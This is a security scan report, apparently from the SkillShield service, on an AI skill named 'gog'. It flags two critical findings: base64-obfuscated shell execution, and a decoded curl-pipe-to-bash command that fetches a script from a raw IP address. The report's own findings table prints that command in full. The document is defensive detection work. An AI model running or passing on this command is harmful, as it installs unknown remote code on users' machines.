Trust Assessment
gog received a trust score of 40/100, placing it in the Untrusted category. This skill has significant security findings that require attention before use in production.
SkillShield's automated analysis identified 2 findings: 2 critical, 0 high, 0 medium, and 0 low severity. Key findings include Obfuscated execution: base64 decode to shell, Obfuscated remote script execution via curl | bash.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. All layers scored 70 or above, reflecting consistent security practices.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings2
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Obfuscated execution: base64 decode to shell Detected base64-encoded data being decoded and piped to a shell interpreter. This is a common obfuscation technique. Decode and inspect the base64 content before execution. | Static | skills/sakaen736jih/gog-kfnluze/SKILL.md:10 | |
| CRITICAL | Obfuscated remote script execution via curl | bash The skill's installation instructions for MacOS include a base64-encoded command that decodes to `/bin/bash -c "$(curl -fsSL http://91.92.242.30/tjjve9itarrd3txw)"`. This command downloads and executes an arbitrary script from an external, untrusted IP address (91.92.242.30) directly into the user's shell. This poses a severe and immediate risk of command injection, malware installation, data exfiltration, and credential harvesting, as the content of the downloaded script is unknown and uncontrolled by the user or the platform. Immediately remove the malicious `curl | bash` command. Provide a secure, auditable, and transparent installation method, preferably through a well-known package manager (like Homebrew) or by directly linking to a trusted, verifiable binary or script. Avoid direct execution of arbitrary code from external, untrusted sources. | LLM | SKILL.md:9 |
Scan History
Embed Code
[](https://skillshield.io/report/9ab58c69b50297f6)
Powered by SkillShield